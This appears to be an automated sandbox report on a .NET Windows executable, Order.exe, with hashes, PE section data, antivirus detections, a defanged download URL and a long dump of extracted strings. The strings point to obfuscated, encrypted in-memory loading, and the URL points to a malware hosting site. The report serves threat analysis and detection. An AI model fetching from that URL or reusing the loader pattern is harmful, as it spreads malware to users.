File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 305.00 KB (312320 bytes) |
Compile time: | 2018-06-27 21:56:31 |
MD5: | 95fb4a270199cee40a137e6d35067a84 |
SHA1: | 276a7c67da46edf1f932a41c3a68aa143398cabd |
SHA256: | 095efa41f0f29ac0025f691887a99a6a7d68b272604165814f978075f90dbc2e |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-06-30 17:00:03 |
Last submission: | 2018-06-30 17:00:03 |
Filename detected: |
- Order.exe (1) |
URL file hosting |
---|
hXXp://abatii.web.id/smart/Order.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-06-29 18:07:56 | [35/64] | ![]() |
PE Sections 3 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x25244 | 152576 | b5fd2afe3ea10102a1892404599c989b | 07628f8c751947ca8e205a24ad6c9d95dd7f4ea0 |
.rsrc | 0x28000 | 0x26af0 | 158720 | 6a5ca7d55e728cbf2b28c03eaf999adc | c5cde335c8738e04a55b95c28aa459e9bb9c9a62 |
.reloc | 0x50000 | 0xc | 512 | 9bbf5aa8289858b6eff4c835ebaece62 | 513b15d18b5468595c7327e8edcb954a409d4e86 |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_ICON | 0x2c3d0 | 16936 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x305f8 | 20 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x3060c | 524 | LANG_ENGLISH | SUBLANG_ENGLISH_US | |
RT_HTML | 0x30818 | 123113 | LANG_GERMAN | SUBLANG_GERMAN | |
RT_MANIFEST | 0x4e904 | 490 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | 17qIfHgP |
InternalName: | EEXBwVS5 |
FileDescription: | EXva7wnp |
Translation: | 0x0409 0x04b0 |
OriginalFilename: | px4ras6p.exe |
ProductName: | 6LZWsfbN |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
file:/// |
String too long |
---|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING |
EXva7wnp
VarFileInfo
FileDescription
{11111-22222-20001-00001}
Location
$this.TrayHeight
{11111-22222-50001-00000}
GetDelegateForFunctionPointer
{11111-22222-30001-00001}
17qIfHgP
{11111-22222-40001-00002}
$this.DrawGrid
px4ras6p.exe
StringFileInfo
Translation
3y0LwkxXm9oSCsx74m.18veulde2xReYOYqo3
ProductName
System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
InternalName
{11111-22222-20001-00002}
VS_VERSION_INFO
040904b0
file:///
$this.GridSize
$this.Locked
{11111-22222-30001-00002}
$this.Localizable
{11111-22222-50001-00001}
OriginalFilename
$this.Icon
LegalCopyright
{11111-22222-50001-00002}
$this.SnapToGrid
{11111-22222-40001-00001}
System.Security.Cryptography.AesCryptoServiceProvider
$this.TrayLargeIcon
{11111-22222-10009-11112}
EEXBwVS5
progressBar1.Locked
6LZWsfbN
$this.Language
progressBar1.Modifiers
w?"Zn
gcKG6yOkcCCUGW3qqXj
"spl
.OQhv`
>eJI
-\q)
Mt3
smethod_13
smethod_10
smethod_11
smethod_16
smethod_17
smethod_14
smethod_15
stMA
D{
_'K
Int32
d"Pq
%h0\
uol
&yi1
ObjectHandle
&uq]e
O&/
lc60QaOLwsPgrKPXNAS
textInfo
TargetFrameworkAttribute
b+MD
w~D?
ICryptoTransform
get_AllowOnlyFipsAlgorithms
x@m2
P[?4
!eqf
_p.!
*4{f
A=5/
TnP9pdpCqO4w5jCtC1
|\O2
<I{Er
Aa1W
1\Rrt V
GClass0
PB>F @
sx|P
Z.~>
smethod_12
-70B
J1bn
m@]8N
b~-e7
- GK<L
O~!Yw[
h:y>
J\>}M
8" N
{9eJXd/X
U-gb#
AOw|
1%=r
?k6O
gcKR
J%Gw
Td<zN{
oH8rh
d,~i
N6mhDLs6UdpxmY0tk1B
K>N#
TDEIp
'RY#
*t{qz
v$"x
ekDkLYfUtaZayGhyWWv
b){h
smethod_0
smethod_1
smethod_2
smethod_3
smethod_4
smethod_5
~tp
smethod_7
smethod_8
smethod_9
) \ O!
_Q)|
*8GG
RfMnpP
Tfp@U
d ^Y
?KyE<&
`FwO
k%#_
PNG
'2!h
2K08
w!~%
_;y] a
Ceiling
4{/D
B\Qf{
Y';h
%yz;
![+6#
]rt
Marshal
$!k>
DateTimeOffset
"PQ#
&+`
compilerParameters_0
0L:<
^1a
Mwzv
UidX
sS%F
'|VV
fieldInfo_0
SortedList
AssemblyDelaySignAttribute
<dae<
[twr
Replace
r$"X
Y Q
+1?~
xx[
G\FY
[]R1
V-[J
X4n87
u[aQ
uQw/
coh~
# x;
Y D
N-Bs?
$R|
WRGATEshx1xE7883OSG
;.<G
;+9@
QZTUNefK37bFYfIgNMm
28C66gEdfyuxjXKM.g.resources
$8(_
#'w{
+0
r=_5
Y |
MU&!
HL+B
t?'Gp
Uc>I
Y f
EndInvoke
]WgF
tw~B
bavraqsFaB26Vg21Fwg
bAn+
tG9<
U$ ^Lg7
_b`*b~
ci7+
FileMode
OpenAsyncRetry
xsI]
_)N8DY,
stringCollection_0
@E2Ue6
Hps=
({#c
>"-1
3L<Q
qXF,
(6PJs`My
Z.7!
Write
;X?j
Y 6
aMpBF4sXgYBbPuPyUjw
qgh@YhwJ?x
y`G
KceC
currencyDecimalSeparator
eoH-
5l2q
A JS
n/y0
<ej
1#M
6D$q&
f;5
OGE_
j`U\h
sM=x
X323k'}
AssemblyCompanyAttribute
l7&vbdF
$f R
"}q/
]=$F
]4H)
LpSL
-D|
YJNGs
(7x"
Gl\8
x]t*
j_6%
*|g"
|)c9
!1-i=
3jjw,
FLXD
@lR
C!^.6
m_useUserOverride m_win32LangID
[V7/
;F
h\{s
iFONMVsQZJnc5u77KHQ
u dD
w|=RK]
cM7
4e=y
Gg[#
zRqiOK5RlxxgIxTVgW
E V_
QO61pKIfpZkVKr95Om
P{"A
Mf4,
Pd t
fiVr
0O{#
[g\Q
iLpD6osLF09EGAkL80R
Exists
System.Security.Cryptography
Au4
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
^Vjh$
f]>5
K^+-
PADPADP
O5e'J
0iN
#uw>
s eO
y}7/q[
x1X9J
7w/w
@43p
Gw"s
/QcS[
sortedList_0
4}Ev
~U,Z@
eK
WP&J
+ yB
C~3j
jlj
h) bU
\^&a
Pt:
]<FI|.
qf]
FromBase64String
zd53tgsd3qhZlBUqt60
?8A
6 VO
>]od
|9C7
fqOv
AssemblyTrademarkAttribute
L_\a
deWbiAsefpJp3awqORw
m_listSeparatorm_isReadOnly m_cultureName
?Dnc
pJz2
~c&
lHnv
%xd
h!yf
S,S
Faw9
%s:4
B46{
=o1|
dy[lZw
#0'92
w?q`+s
{87yK2t
JofnRfcMxWTJ1hHSMS
rF>|
ZA<$
(CNw
k8O>
O7ShAGf4fJYhWwdfDS1
04}a:x
[%&0A
_1]:
@&2'
1bDp|
Wfp)
amVC
B]a>
kHyJUNq2fkaUnpjXXJ
EB[P$2
I}p/
eSkS@
uR"NdC
pFnF
2Km9
/zgv
PZ 6
BD`I
t<V&
jxl
keHw6CsNOf2pYGNnxTS
x14R9xoN8GdTLKhuZ1
Y%o&
#@@e)
7}'qvJv
v% B
~&_
ciT[
(Lo9
B ]|
kJo
`M!p(
-9 y
j #y
X{X
L).4n
,I
Co
N.4Q
-fxR
e=]'
binaryReader_0
.yT,$
_o~K
G.Tg
qYqk
B3pG
qkQFIa
Him D
eM^~
E[PS
^JvB
KzY8D?
4r>|
LuIq
TmR]
BRg
GetValueOrDefault
7g?D-
"x<_
h/oP
A_pGo
OJOG
MZ[=
YR.\
numberNegativePattern
p"d`Kg
Z-P,
!Ij|
a|0F
znO64jF1LIshg8d9yU
'7t
!67<dR
@T2UZy
CreateDelegate
_l~S
)f]x&
3W v
jTXG~G~
;!+EtE
An@A
IDATx^
z?/I0
Z}V
"Kla
29w
/N.73J
F3G@
-QhP
mK'&
5!Ov
5:Dk
Padding
KP6&k
s;F
as|[
e
guy.[
0!l
X $4
ResolveType
H#x>A`
/}dLy
nQYb8TOwGe1CtJlET2j
__
k<&g
pr_;
{wC
z2pArYfZMNKZOBeax4X
Ep<#
CU~j#
uQsBh7fL4Miu6TBiwl4
.ZzD
zx)d
;A*/"
=6qvZN
d'y
9_X"
+LSs
Da/P
C:bH
_qbF
Ondr
nElOCYYvEFx1LDVj6h
N E
JS-)X
d<q~
System.IO
Av?klb
2CMW
[c8N*
gRDWO5{
c #
"[kGlr
!/jnLK
cM)V
''5]
,iqw
~p^P
6Yk9u
9<27
EDf
R i
;6vw
1STb
.text
!N`1
qvNtRLMvKN8MkOkxQq
ce4DmfsmSrOT856tDgfrkMb
GetString
.I6R
i(ZC
YC ,
jK"@:>'B@
XZ/UJE
?28
N|b\
CryptoStream
SsxH
Pw ,
Convert
16?? c
=0^r
q#|6
positiveInfinitySymbol
'``OPT5w%
object
RwoL
percentGroupSeparator percentSymbol
1)8[>I
FlushFinalBlock
numInfodateTimeInfo
<TK/[
3}XYYQ
iJ1LkLfyJdj7Sv5X4m2
&+8E
q ih
>(o
LL2$$
ObjRefNMLVKEYDOWN
fe+.
iiC8
H6DJ
ZJL0Yw
P+,X
3mz[
Xo W
<B4i
:le4b
V wb
ToBase64String
lP_ak
$$method0x600005f-1
$$method0x6000020-1
TxpahOvcBPGE
r3D:
n Uy
zk=Mj4
FKOL
7{/R.XF
encoding_0
ZllP
{3l@}
P,1:
u9'
jUc6
WriteHeadersCallbackState
)Z{[
X Au=
aoeD7Bfux4PoyNsb1H1
X)RouX
dLg0
$Z'k
CP;dq
CipherMode
RI|A
.TY'
76A I
SR]L
$=9
System.Globalization.CompareInfo
cbE.{C
yfy-
; 0}
Lm&
WO@%
mw#!
lZ!ZgU
6x,\
XRc<
_@V2
wbPpHeGM0fiB2K2N9S
E%n?
hS?6f~cm
smethod_6
[7<gd
H' S
S@#
PAtx
3<<w
RuntimeTypeHandle
@"w{
I*V0{6
IwzQucQzApjy
ejpwTWsBAqQuqeREXDu
8xWa
Ft$W
9jq8UD^
<r'O
(C a
B|:o
$\j2
SRi{1
l!!.jE8
System.Globalization.Calendar
long_2
L%u/.G0
K\E6
UcBXRmsHgE16cMuRKli
vs%-.
X.kh
=v7\
,'n
96~)T
`.rsrc
=#(1O
<Hn(F N
T"[v
&%Mn
/V=u
,4I9
x: L
?\O p~X
$|\*
IEm_
WJY
L]vS
IconData
*2(g
8.vhL
">=~6
*1gB
result
Y]4p
XI0H%
jib
MQ<Z
b}(5
>ht=o
Q [B<
8/Q aw
pHYs
LMoF
7uqCf.n
e!9LnI-
*2(E
.ctor
vU/r
$'}IL#;
get_CodeBase
1Jw^
vlA^h
; OBmA
NativeOverlapped
;5x"
&iJ.P?
W~
ktlInMsoyv74GVcwlEN
a)Nw
eZ<)
UM\)%
\0p W
(F5
}z$^K
K"H+q
SYD
{wtA/r
OI5_
#dn #
*2(4
j3IPDnKGZUwYGhm5hM
zJxD6
Q48a
~cQc
'>1po
Hp,_
G1z*
,18$[
PZt
n}&J|
DJLo
<z+r
X/${D<jq
/4p c[
caEchBbgXo
]j,!)
L!#Np
9p*q
XqA|ZT
G,+fv
}d[*
SqlUnicodeDecoder
Km^
height
Zlde<
9*9;
UPIx
G2EG
9Kp"
DdGsevfijafPqvNuuVJ
Q8Vy
71qz
1y}W
delegate1_0
delegate1_1
StringCollection
U5 ` =S
w3l/
[;y
culture m_SortVersion
H$-I
7S)T
XsMZ
[Og+;f
-W7x
na.Kt
M|D-E
/T`2
-R_\
62UW
:gc
=lzD
(+A&.
x.r
?& D
q9oR
y;LG
mY_[5
W8@)
ZGW
+J(J
vm $9^w
OZ3iLrf724TTas8yif2
GetBytes
w8XI=hd\
+Jqnz
Gz;`|H
Gkl9psfRAS8lBGRPXeZ
OSyU:
Vd}=>
;!t#8
UKNS86fBpK9yhwbjLwg
3vZA=
TI7K
Enum0
2)?
~pjjY
0mzc
Lo( E
VcY,
& =
VA2:H
*2(j
Zp!r
wcvdGjfQ6sRkBY4FGR5
7tc&
c>vN
*2(u
!*W2^
'vZ$
.:4r
}2U%
F\b)m
c+4r
lSYV
nativeSizeOfCode
get_Assembly
*2(L
-x1N
DynamicBindingFailedException
-Os
-MHN
O0e59YsbNFUbt0PgJ1P
OffsetAndRule
u"_I
()R/W
w]J
,NsU;#@
/d8t
-sI
*2(\
*2(]
$;K"O%R
33$
`>ti!Hv
?Kn/
!z1)
@wcq{
9Rge
*2('
mscoree.dll
Y1C
_:Cm
uN%
TImF9S
uHAG
RmVvpCsTOhuupUfyQ4G
LAdtMnsuN99sc06xBTw
gWOWJy
L _?
7ZiW]
|[*)J
ox"/
g$~D4
v6#Ro^
*2(?
System.Reflection
_u}Ns
sE{r
^v=u
yN*3W
f!DNa
\R\>P:!0
*2(
M$Q
WrapNonExceptionThrows
JbDIGGli
AbMAVR
&|}&Er
nD4,
0GB"
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo
numberDecimalDigits
Cz-
H5SQ
4"N
MQ [r
?z[
J(ja
e*(vL
^o~bD
SNp%<8bD
Console
vn=bx
QkB#N
vaS8YJ4sDEsJW8Har3
DM-E
!\V
=6'y
;]&6v
U5UlTDfhRXOoAqoYocG
eXwkTSJ8HIIbCBYA0D
KY/
@dF`
nF2]
Yu+5
E"c+
w_T
!KE#{
YE+c
KhFVHSfvNV8pr88MqQo
EKEi>
BUCD3
Y&u`
s%:l
wRRB06lph0tYZD3njN
|T+BU
N,W(^'NG
Vu#*
jM~(X
} S?
em0g
int_4
_-b
mMFK|E
$e$p
)"TH1
a~%,f
`%gy
IHDR
System.Runtime.Versioning
SjDk
method_8
bLI~
Mf&-En
QTmU:}c
i0_30{>sh
#J \+^
W8`13
6N[P[`
@v<0
-R&
<nnd
0 0
FU8p
O`" 7
LNy3DQf2wk2AYc79iD5
h[)=
PUGF
qoU^M
MH`qg
w; k
%EK
3iYp
td$)
System
I4n=
f};S
zu"K
L@$v
{x,y
.M U
System.Drawing.Icon
isno7jfFr0myBh5DHj9
Q1Bj
pJo>6
=:nkrH
N97qDdO6F13yGARwlRA
lZR7
eUa&I
kw!=
=*\f9h1
(hNI
sD6_
qJZTe2O5gP3gHq5VE9G
&Nn6
2=\.
W: ]e
6lw,
eaaXDH7H9BnnaxnXSx
v$GF
uzvA:h
7Ku~
Class8`1
IqunGpOgbRQItF4fu8f
CreateInstance
S@y>
KFN55hfTWCrisPMpCNI
$$method0x6000039-1
K.q
XU3
nh2,
#0)U
`?of Z
G:8B
z_XWh
8h$}/
4xeB
MethodBase
&QS-S
{avw
System.Collections
s] <
DfRk
Dh3
YFH9
1nj;
set_UseMachineKeyStore
tZuX
McJn
ToolIMapViewToIReadOnlyDictionaryAdapter
w(-&
B1==
FunU
LcPI
9?Q@
9wQ[@ZUT
f)I[
/ + &+
nn,U
memoryStream_0
:A@6
!aN l
Tn)J
G]Fc#F
Sh
y#p~L
currencyPositivePattern
?YFe
/$$x
TPMGxx5Tn3growtOSH
2eKV
UjoQ
digitSubstitution isReadOnly
DEEt
K^ '
CP\D)
X 8
3m M
X 1
O2mD3Oayfk0f8Zesr2
dpUG
}p'E
cRD:
X A
X C
?a S
ysT_
_$flu
M`uq
X ^
f5oq6wsgWoML3gRp8lY
G#p(
o`'YWi
string_0
Ws?v
q`fY
4SA!
W*a{
z|z2a
System.Diagnostics
X `
GetType
bGkU92
A?D;
7FS?F
3*3
0N17
XT*F
X r
o=oE
19 f
hNLn0XOBH6bv4H2CGJH
7(3.
!<ub
fM)1
Microsoft.CSharp
#@gD$
t^\0TVG
Delegate0
&t27%-v
,9I
Activator
'N0]
8#fJ
?R!\
bs:26!;
WaitHandleExtensions
vKN;
"NV&
p=Mp
uWPQnOO9DN7RMN8KqAS
x+Oz
>I @
_Wd)v
ge+]
^p6i$
#0gGQ}
adS
q``D?
?JCURK
Jm$
(?i!%
v$!!
d2GI
mUSi
%>F+
?i9
Double
|!Fd
Uh+4L$
t |B
]+5E/dl
T$ Z`|
"NU]&k
n'@G
CompilerResults
}%V~
yk:Wu
String
:3xi
BLeT
X$),
)"
"5o( yN
7Lmn
yv=P
JJ-%
<%ZM
1{')
@U*
MD5CryptoServiceProvider
TY_6C
XH0\W
~_MU
4klf
get_BaseStream
v/*UrDA
qyiZ
(_$w
?@WV#
V\I^v
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
3H^d
4gGo
<DW[
Mo4K
Zw>t
get_UTF8
TNdA
Y'GY
;?L`
}Ywk
,N!T
Q5G'
L#1^I
4W+`^
kD9oaw
3s0M
PY38
*2(
TyTMsGfAJqMDRrp2kR3
#n#!
8+=t
5.6a6?
aLqT13OCEw4mTtut2kj
gPPZ
w1%=
P+Class7+Attribute0+Class8`1[System.Object][]
dgiHWAsfigXUlhBQtwd
_w[t
+'nvm-
AssemblyKeyNameAttribute
0')!
}9x E
7KMR
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
S-Rrk
!v C
\pF(
g*Y W
$&~<
{U(#Od
get_ManifestModule
[2gU
oc}+3
yuOty
9z"lLqZtw
OperationCanceledException
Y&xY
:k1_
:#>+
'I@~
$J2
,m!m
|L^&
2>_X
y !z
8zWv(
1 \nj
&cKq>
B\oV
!e-
BitConverter
~tf7D
Y3\b
3\P{]
:sNO
[o5j
Je\K
Y]rRJ
TYqMW
%-MK
h,HB)TL*^
eEOO
.9]H
n18hWrOjaiWssGDDZMF
XrcLd
A(*'
\oVR
BVl; b
wVuh
tx@G
U!>
#?~YdVJ
NMTOOLBAR
System.Core
3 |>~
yYX $
P0JX
e#cF]
/~H?
9J.@y
tfDp
;6xU8
/l@
VM\Y
DMOt
Delegate
yfY)
AssemblyName
]<7}
6!g[W
y83<
mnqK
|$2+
o|~.
uz=Md
DD=V
System.CodeDom.MemberAttributes
[jk9
( -f
3T%7
XWgdJaOnh01q1vbx0Tm
'o$rZ
8@#5<
zGp~Y
*tN 7
D5h8Q
;;HO
jP_q
,/E
n\^D;
[)&@
pR>:
nni$
UpbjsKBej7wmARQT64
[.Zz'
dvx<
eP:1
zPO<
>k&+H3b
Enum
ah<mz]_P
5\yZu
i~|RT
mM[z
AH5XQjsKCNxu90DOHxw
=2b]
xR^c
~3u[W_f
#Strings
ByteArrayHeaderParser
|IcJZ
assemblyName_0
InstanceDataCollection
qc\}]Z
jmghb3HutEem003uxM
UltN631SKVObMYlYUX
p5ZOR
pYKBGJOVHSmwJuCKhTQ
[L?fh
!tM~
G@/>
D;a
eU!=
1>fi
1i#5
~;(c;
K"7/`
ZSf
&X
Mn@
get_Length
perMilleSymbolnativeDigits m_dataItem
D0/2
6$\-v
Y{V>
xyQ
m_name
jmyuz=F0Kf
jL:.
H)
9|vm
>1i51
\hqJZ
wx<4,
N4RZa2saC5yP6yV6F1V
6 U7
S>v"
__AL0
aRPO37eSm0E0M61gWv
's
<-3(
9aV`
^I.o3
!N 9
ib5 +|
! :3R
1+,F
TwoPaths
J$b8
-=rI
$O?Z
lVBE
CompileAssemblyFromSource
-=rr
wxR}=b
F+ >epx
,LzE
O_td+
f_`X
4pL6
System.CodeDom.Compiler
L-rP
`7{N
c)@,
6OU
7P
ABq',
4grAB
%>Q*
!V/wad2
+#H
zI|^
>KOS
kO,
+SI ehU
fPufT7OFSta1njHcf4D
c)|^u
9kS
Of4ypQOPaQhCr3XCJHk
/ -~
Ay2hQdsjOg3Ci3NABix
"zl
znmFI
tr%hu
Trim
nUdZlGgsMJXHWpfSp9
rZ6uu4O3ievEbXH0r5O
validForParseAsCurrency
8(on
oa^+FU
|(6 m
Format
:I`X]
~!(@
NeeKLLfqZVuVUHSLxWD
Lz(Mf
p7RBULf0nt5LyQvcvmq
.vs/
{eS'M
^!* .
MB))
x{EM
[N}&
krdGbROJ7xeoKAX48nG
b-R\
$LI
%b\?
dIGq
nNNX
"{%TP
:(LC
M$9+?
J+T!
%)'@
jbM
ge!W
,Z`o"Vy
YsH8o
gwasY
wt:n
Y]#fb
Nm4
#?yY
*JAc
wE*+
m9P7Y2sOPS7mO1QiPOm
|p+FNp
RQfF#h
[5G
$Y"&N
C@`
\:il}
UInt32
ToInt32
YJ{l
%`B
?qE4G\O
t,]HcE
assembly_1
'] $$
_JHm>v
&N>"
-]]/
0*%6
ToString
EEuq
stream_0
~1g6
-;W=
.!Lu~s%
ejnC
>rdU
oI#o
h'>(!
vVIS
array_0
za4;
QG+<
A=_$M
n~/I
2_Ja'H
mUP]v
_n:m
o_ku"
Y7yg
!u<8
Hvvx
r$?gF
W[[
o!Pw
9tw*
O6FTe
&(uXg
_b(U
n{/Ro
AIUBbpVP7tDacuL7mh
X<c#
?J
E~}{L
Xpy5iqTZmAyBwATkg3
C\A@ Q
currencyGroupSeparator
U*1/+
U-;
%!N
C2@p
]*a/
c T)1
h\09,
WS$+
pmxBmus;?Q[
zSMwjb0k1MBVM6tbZA
z(>z
iIob=O
Y<?e&N
N`GBh<*
c6{
3_;*5
#i'5
Tvd,
args
AssemblyTitleAttribute
_0@
xQz#
13 g
<PrivateImplementationDetails>{7CD7B5E3-4B66-430B-9BA6-4BD8CD24CA77}
&+E&+R
F_{u
XBJ0bQs7m4ghy6qHrxf
ta17
.|1 q
h\R<2
h0?uAw
<Qt|
X mo
qZj|
Zd)1u
_m1H(
gLsaN
[}_}
g{F2
?"$\
8<~5
G<&VU|
X+tH%W
a$wX
i$ic
] -
?Bra
wqYJ?
MemberInfo
%|Wt:
>-y2Q
+\eS
o\;)
r*Vk
hGl=
1`I:\Ia
Ij S
#"lN
fX"@
G)dc
wTvs
_7H|
m'w6
<*%$
set_CompilerOptions
MxAwuV
tfhRggfoDl6QAW1erYX
0N-,8
width
,xr<
|_l@{
CMN4=
ushort_0
(B],
d}2u
d|.C}
$k0
K8
!d 9/
r+~%
D}(HCw0A6
4g7V
Jv)3F
>YI
D8%b
[lOzK
Ksbj
v+{G
~)=]
currencySymbol
numberGroupSizes
SW?G
WBXeMuQM4v5Cu4moQI
/he8
get_EntryPoint
x4nx6ifrGHUSNPDqfjv
dzK
-R&+B
lY>U
numberDecimalSeparator
.[bZ
E9}7
<Uh
3T$}
k:Ae
nV#=z;2
np9#I
+ke% %
6ABowH
Zo]\M
jG_&
T)Cp
o1AG
v.<U!g
Glz3
:!Q^>
YI c
K5Gp5ys8vJyf4sb513c
e#wr
[<^_
m%kq
Z/O
.+SB
eJ`1
6O 0+p
Main
"!;?
L5am
KDRJ6Jff49gCVFTmBpM
D%w
iA M
Invoke
_Q(R
#URo:
{]S(
}jnC
Z"/ujxf
method_2
method_3
method_0
method_1
| 9"m-
method_7
method_4
method_5
gwdng
NY X
LWbJ
RYC^y
v4.0.30319
=|oT:
*s|S
[;zd
/}D[
&]ZU\W
$MURN
.)K=v"
_ A*O
OK!lA
A# C
nUfQ
9svo
v 1 uY&
m@>/
Delegate2
L8YN
Module
Delegate1
>g\);G
/D`h(*=
qCM!r
Array
R=0]
y%/5
A{2
_Qh]o
3COBD
LgLH
intptr_2
intptr_3
intptr_0
intptr_1
h?VE
IListWrapper
-&+$#H
@.reloc
%)g~2L
wO?hT
:IT6
` To
LI81"
`z`Z
<B +
>Y5NW
rOH0DQfp9l3JSN4U2OE
UV4
M@dS
rmZJrUsmLT6RUC3Lh9P
0960,5<&
/VT9
5^ @
j4b_
&+:&+A
x-Ms
vGNvL
E(X
'XN'
^(dk
Byte
Y!BK
A::
/L#
U8Z
$KUd
*,K2
CryptoStreamMode
I6go
currencyNegativePattern
w3W2
o.W5
2N@Vb
Oj8|:
-($A$
@#nWR
get_MetadataToken
k v:6
{wvHO
.q^Q
C{+n
k| :
SoV!1
p,[
OR9m
*XT^g
yM8}
enP
Y_,*$
Ya&z
vyO
Vz$)W
8wu
F+t!
28C66gEdfyuxjXKM
zguF
gf[fz
Flz~>
lfk`
I6;g
PtSmi6R
h.[6
compilerResults_0
txQc
@wf*}
_xz)
' 3}C
nP".
Y`QzC
:\Ri"
"@.q{K
9pu=,-w
numberGroupSeparator
;nh7
u$@r
ArU"q
}t;:
get_Location
_D9>
o%*82#
`Jg 5
(?Z7
E>.k/FT
!{O&
(}9YQ\
RegexFC
bT8W@~
X#yl
LsyT'
,_/W
1 z<oL|
sW2J
I%8#
comp
l"j_b
eWg{
p5CT
}_UY
c{{}
FrameworkDisplayName
&)2
[[pL y
k;'5
@k `.
tZ4:3
ca7qfqWQ41KZQVNGsr
BtL{
,zP
&ve
kV`O4O
UNICODE_STRING
get_CompiledAssembly
QOdxPgEqcdSfA0iPf2
FZ1Pz
j3 +S
m{I
-Ch,
(Z-#
eI?$
HQ6
#]i 1
M\ '
\
zOp_'
RuntimeCompatibilityAttribute
`E7hGp
exQN6aBzqUE34
>A?w
v+Kl
Buicm~J9g
vtRPQisPowUXMNlTe0l
SnC
Assembly
fXm;
Truncate
<j.k
9f^1"
U,e
K+x6xK
%;R r
h(]Y'.
ReY
PG4grWylbCvuBI7Vs4
Wu/
`6NAFz
tqe+
System.Drawing.Size
WL`8
)! _
b5KS[
B|JUM
. M !
1p$;
H\OP
dX(
jMY%
Lf.6?]
xl8H7MfdRX4oKOEY1Ab
WoS%
LUi94IsvpJS7qDDUC6d
FM9m4HsIXSpyxCEpBk5
'h0.*
KF=v1::H
q* x
*=dmK
nC]d
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
C;"N1f
pXS8FFRgIZaYu7uAVn
set_GenerateExecutable
Hr[pPb1
-=&
iPod
w<dv
6[Nk
4P=<`
:? h
%$5?P
`Rq4
3E]X
% a"M
A9iJR
a0Bog8s0f3PMQ82lg5A
FX#YM
tcX%
vP c
/=A[k
3 OK
)Pm2
+G#H
9dh
gE^L
Class7
FM4S4MfIV7UGTU2L2uL
AvX6
lA7K0HjQw5WkMWrcIo
I!+f
`iET@
:Z-8t
6t&]
.JWKX
bZB7
~,giOh
m_name win32LCID
$vlmX
d&je
rx3
qD T
KmBq
)QZm
"Z#yu
1!G>
bMlJiJOYNADSUOax5B2
, & `
!j'}
NtJGo
PJK;
lXEXXlO07tAgVHMm92P
OpenExistingResult
,A|E
<{}(
\Q.]
q2~
@]zxY
#CC,#r
&++E
ew\^
WJPQD6ssZ3Ab7doErkD
Z$%>
D,A
m\INie
< )55
YP~WltE#
|@MD
sThnt
dF2Y
44g
2+H\k?
yoQ
RuntimeFieldHandle
Wb@6k
P=p(6
uw[g.
!#+5[
2'ji
gK'V
yVGQ[%W
{"xE
yfkM
>/J
?]Y|
Vk^4N
YLc1
IZP$
hashtable_0
^)PpvL
Amnu
IWZA*
3P\E}]s<
fkmS
r 1f
v|D1Vd
R=~7-W
1`\"
p`
hgmhhTA6Y04CrhNqwT
kxxp7.
W(-T
,Q&
FileStream
$R&f
#Blob
P:q&
StringBuilder
kDYhbWi2TeWFSDhRtZ
- &(!
,gz
5;G@
\EYSJ
KZQm
nQk!
Em^
3Sy+R
vZ,X
Uq~0]|
Ps^~m
get_ReferencedAssemblies
<So7
b]>5
s732
7<l0
v5*]D]a
(g[6
o2h!=D
.T\c2
#HS}
I3{"
t kA![
EVEBI
ListChunk`1
34JU
dYhYCfftgPF8Kg8iPWR
`%`6?H8
$ [Q%'
#&6
XmZ\
|q$
B\jb
O"zD
